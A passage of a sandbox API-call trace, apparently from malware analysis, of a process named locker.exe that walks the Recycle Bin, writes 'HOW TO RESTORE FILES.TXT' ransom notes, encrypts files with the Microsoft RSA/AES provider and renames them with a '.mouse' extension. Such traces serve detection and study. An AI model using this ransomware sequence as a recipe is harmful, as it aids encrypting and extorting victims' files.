lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=61, lpMultiByteStr=0x436af0, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", lpUsedDefaultChar=0x0) returned 61 [0198.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0198.279] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436aa8 [0198.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=61, lpMultiByteStr=0x436aa8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", lpUsedDefaultChar=0x0) returned 61 [0198.279] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436aa8 | out: hHeap=0x3c0000) returned 1 [0198.279] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436af0 | out: hHeap=0x3c0000) returned 1 [0198.279] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436dc0 | out: hHeap=0x3c0000) returned 1 [0198.279] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0198.279] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bd78 | out: hHeap=0x3c0000) returned 1 [0198.279] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40aa20 | out: hHeap=0x3c0000) returned 1 [0198.280] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", fInfoLevelId=0x1, lpFindFileData=0x12af88c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x12af88c) returned 0x432bf8 [0198.280] FindNextFileW (in: hFindFile=0x432bf8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4354c8, dwReserved1=0x81, cFileName="..", cAlternateFileName="")) returned 1 [0198.280] FindNextFileW (in: hFindFile=0x432bf8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x4354c8, dwReserved1=0x81, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0198.280] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc10 [0198.280] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xbe) returned 0x4163e8 [0198.280] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40b438 | out: hHeap=0x3c0000) returned 1 [0198.280] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc10 | out: hHeap=0x3c0000) returned 1 [0198.280] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa0) returned 0x41c040 [0198.280] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ccb0 [0198.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0198.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x12afcd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0198.280] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ccb0 | out: hHeap=0x3c0000) returned 1 [0198.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0198.280] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435050 [0198.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", cchWideChar=73, lpMultiByteStr=0x435050, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", lpUsedDefaultChar=0x0) returned 73 [0198.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0198.281] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x4350a8 [0198.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", cchWideChar=73, lpMultiByteStr=0x4350a8, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", lpUsedDefaultChar=0x0) returned 73 [0198.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0198.281] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435100 [0198.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", cchWideChar=73, lpMultiByteStr=0x435100, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", lpUsedDefaultChar=0x0) returned 73 [0198.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0198.281] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435158 [0198.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", cchWideChar=73, lpMultiByteStr=0x435158, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", lpUsedDefaultChar=0x0) returned 73 [0198.281] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435158 | out: hHeap=0x3c0000) returned 1 [0198.281] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435100 | out: hHeap=0x3c0000) returned 1 [0198.281] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4350a8 | out: hHeap=0x3c0000) returned 1 [0198.281] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435050 | out: hHeap=0x3c0000) returned 1 [0198.281] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12af9d0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0198.281] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be58 [0198.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".ini", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0198.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".ini", cchWideChar=4, lpMultiByteStr=0x12afc3c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ini", lpUsedDefaultChar=0x0) returned 4 [0198.281] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x40b438 [0198.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0198.282] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436dc0 [0198.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=61, lpMultiByteStr=0x436dc0, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", lpUsedDefaultChar=0x0) returned 61 [0198.282] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40b438 | out: hHeap=0x3c0000) returned 1 [0198.282] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ca0 [0198.282] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec6e8 [0198.282] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0198.282] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0198.282] AreFileApisANSI () returned 1 [0198.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ec7b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0198.282] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xae) returned 0x427268 [0198.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ec7b8, cbMultiByte=-1, lpWideCharStr=0x427268, cchWideChar=87 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\HOW TO RESTORE FILES.TXT") returned 87 [0198.282] GetFileAttributesExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\how to restore files.txt"), fInfoLevelId=0x0, lpFileInformation=0x12afa6c | out: lpFileInformation=0x12afa6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x3ec7b8, ftLastAccessTime.dwLowDateTime=0x12afa94, ftLastAccessTime.dwHighDateTime=0x363223, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x41f208, nFileSizeHigh=0x70, nFileSizeLow=0x370bb4)) returned 0 [0198.282] GetLastError () returned 0x2 [0198.282] GetLastError () returned 0x2 [0198.283] SetLastError (dwErrCode=0x2) [0198.283] GetLastError () returned 0x2 [0198.283] SetLastError (dwErrCode=0x2) [0198.283] GetLastError () returned 0x2 [0198.283] SetLastError (dwErrCode=0x2) [0198.283] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x427268 | out: hHeap=0x3c0000) returned 1 [0198.283] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0198.283] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419ce8 [0198.283] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d68 [0198.283] AreFileApisANSI () returned 1 [0198.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ec6e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0198.283] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xae) returned 0x427bc0 [0198.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ec6e8, cbMultiByte=-1, lpWideCharStr=0x427bc0, cchWideChar=87 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\HOW TO RESTORE FILES.TXT") returned 87 [0198.284] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\how to restore files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x12af930, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0198.335] GetFileType (hFile=0x2cc) returned 0x1 [0198.335] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x427bc0 | out: hHeap=0x3c0000) returned 1 [0198.336] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x446d18 [0198.336] GetLastError () returned 0x0 [0198.336] SetLastError (dwErrCode=0x0) [0198.336] WriteFile (in: hFile=0x2cc, lpBuffer=0x12ae5c0*, nNumberOfBytesToWrite=0x71, lpNumberOfBytesWritten=0x12ae5b8, lpOverlapped=0x0 | out: lpBuffer=0x12ae5c0*, lpNumberOfBytesWritten=0x12ae5b8*=0x71, lpOverlapped=0x0) returned 1 [0198.338] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x446d18 | out: hHeap=0x3c0000) returned 1 [0198.338] CloseHandle (hObject=0x2cc) returned 1 [0198.339] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d68 | out: hHeap=0x3c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419ce8 | out: hHeap=0x3c0000) returned 1 [0198.339] GetFileAttributesExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12afa04 | out: lpFileInformation=0x12afa04*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81)) returned 1 [0198.339] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa0) returned 0x41c238 [0198.339] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0198.339] GetFileSize (in: hFile=0x2cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x81 [0198.339] CloseHandle (hObject=0x2cc) returned 1 [0198.339] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41c238 | out: hHeap=0x3c0000) returned 1 [0198.339] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa0) returned 0x41cd60 [0198.339] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41cd60 | out: hHeap=0x3c0000) returned 1 [0198.340] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa0) returned 0x41cd60 [0198.340] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41cd60 | out: hHeap=0x3c0000) returned 1 [0198.340] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.340] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x3f2748 [0198.340] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x3f2748, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.340] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f2748 | out: hHeap=0x3c0000) returned 1 [0198.340] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa0) returned 0x41c388 [0198.340] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0198.341] GetFileSize (in: hFile=0x2cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x81 [0198.341] CloseHandle (hObject=0x2cc) returned 1 [0198.341] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41c388 | out: hHeap=0x3c0000) returned 1 [0198.341] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d78 [0198.341] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419ca8 [0198.342] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x12af700, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0198.342] GetFileType (hFile=0x2cc) returned 0x1 [0198.342] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa1) returned 0x3efe50 [0198.343] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa1) returned 0x3eebc0 [0198.343] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x446d18 [0198.343] ReadFile (in: hFile=0x2cc, lpBuffer=0x446d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12af714, lpOverlapped=0x0 | out: lpBuffer=0x446d18*, lpNumberOfBytesRead=0x12af714*=0x81, lpOverlapped=0x0) returned 1 [0198.344] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x81, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0198.345] GetVersion () returned 0x23f00206 [0198.345] CryptAcquireContextA (in: phProv=0x12af890, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12af890*=0x40b438) returned 1 [0198.349] CryptImportKey (in: hProv=0x40b438, pbData=0x12af8bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x12af894 | out: phKey=0x12af894*=0x432cf8) returned 1 [0198.349] CryptSetKeyParam (hKey=0x432cf8, dwParam=0x4, pbData=0x12af888*=0x2, dwFlags=0x0) returned 1 [0198.349] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa0) returned 0x41c4d8 [0198.349] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x41c4d8*, pdwDataLen=0x12af88c*=0x81, dwBufLen=0xa0 | out: pbData=0x41c4d8*, pdwDataLen=0x12af88c*=0x90) returned 1 [0198.349] CryptDestroyKey (hKey=0x432cf8) returned 1 [0198.349] CryptReleaseContext (hProv=0x40b438, dwFlags=0x0) returned 1 [0198.349] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0198.351] GetLastError () returned 0x0 [0198.351] SetLastError (dwErrCode=0x0) [0198.351] GetLastError () returned 0x0 [0198.351] SetLastError (dwErrCode=0x0) [0198.351] GetLastError () returned 0x0 [0198.351] SetLastError (dwErrCode=0x0) [0198.351] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41c4d8 | out: hHeap=0x3c0000) returned 1 [0198.351] WriteFile (in: hFile=0x2cc, lpBuffer=0x446d18*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x12af7c8, lpOverlapped=0x0 | out: lpBuffer=0x446d18*, lpNumberOfBytesWritten=0x12af7c8*=0x90, lpOverlapped=0x0) returned 1 [0198.352] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x446d18 | out: hHeap=0x3c0000) returned 1 [0198.352] CloseHandle (hObject=0x2cc) returned 1 [0198.352] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3efe50 | out: hHeap=0x3c0000) returned 1 [0198.352] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3eebc0 | out: hHeap=0x3c0000) returned 1 [0198.352] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa0) returned 0x41c0e8 [0198.352] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.352] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x3f2868 [0198.352] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x3f2868, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.352] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f2868 | out: hHeap=0x3c0000) returned 1 [0198.352] MoveFileExW (lpExistingFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), lpNewFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.mouse" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.mouse"), dwFlags=0x2) returned 1 [0198.354] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa0) returned 0x41cd60 [0198.354] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.mouse" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.mouse"), dwDesiredAccess=0x100, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x2cc [0198.355] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x12af840 | out: lpSystemTimeAsFileTime=0x12af840) [0198.355] SetFileTime (hFile=0x2cc, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x12af888) returned 1 [0198.355] CloseHandle (hObject=0x2cc) returned 1 [0198.355] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41cd60 | out: hHeap=0x3c0000) returned 1 [0198.355] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41c0e8 | out: hHeap=0x3c0000) returned 1 [0198.355] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419ca8 | out: hHeap=0x3c0000) returned 1 [0198.355] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d78 | out: hHeap=0x3c0000) returned 1 [0198.355] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec6e8 | out: hHeap=0x3c0000) returned 1 [0198.355] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436dc0 | out: hHeap=0x3c0000) returned 1 [0198.355] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be58 | out: hHeap=0x3c0000) returned 1 [0198.355] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41c040 | out: hHeap=0x3c0000) returned 1 [0198.356] FindNextFileW (in: hFindFile=0x432bf8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x12af8a8, ftCreationTime.dwLowDateTime=0x3251e4, ftCreationTime.dwHighDateTime=0x12af960, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x12afa30, ftLastWriteTime.dwLowDateTime=0x36d17a, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x32ba97, dwReserved0=0x41c040, dwReserved1=0x81, cFileName="", cAlternateFileName="茾3쁀A齃Īᓮ2쁀A ")) returned 0 [0198.356] GetLastError () returned 0x12 [0198.356] FindClose (in: hFindFile=0x432bf8 | out: hFindFile=0x432bf8) returned 1 [0198.356] FindNextFileW (in: hFindFile=0x432a38, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x12af8a8, ftCreationTime.dwLowDateTime=0x3251e4, ftCreationTime.dwHighDateTime=0x12af960, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x12afa30, ftLastWriteTime.dwLowDateTime=0x36d17a, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x32ba97, dwReserved0=0x41c040, dwReserved1=0x81, cFileName="", cAlternateFileName="茾3쁀A齃Īᓮ2쁀A ")) returned 0 [0198.356] GetLastError () returned 0x12 [0198.356] FindClose (in: hFindFile=0x432a38 | out: hFindFile=0x432a38) returned 1 [0198.356] FindNextFileW (in: hFindFile=0x432bb8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, 